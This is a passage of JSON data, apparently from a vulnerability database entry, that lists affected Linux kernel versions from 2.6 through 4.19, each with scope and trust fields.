        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.2"
      },
      {
        "model": "kernel 3.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel 4.16-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel 3.14-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel 3.15-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel 3.1-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "kernel 4.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.2"
      },
      {
        "model": "kernel 3.11-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.0-28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel 3.17-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
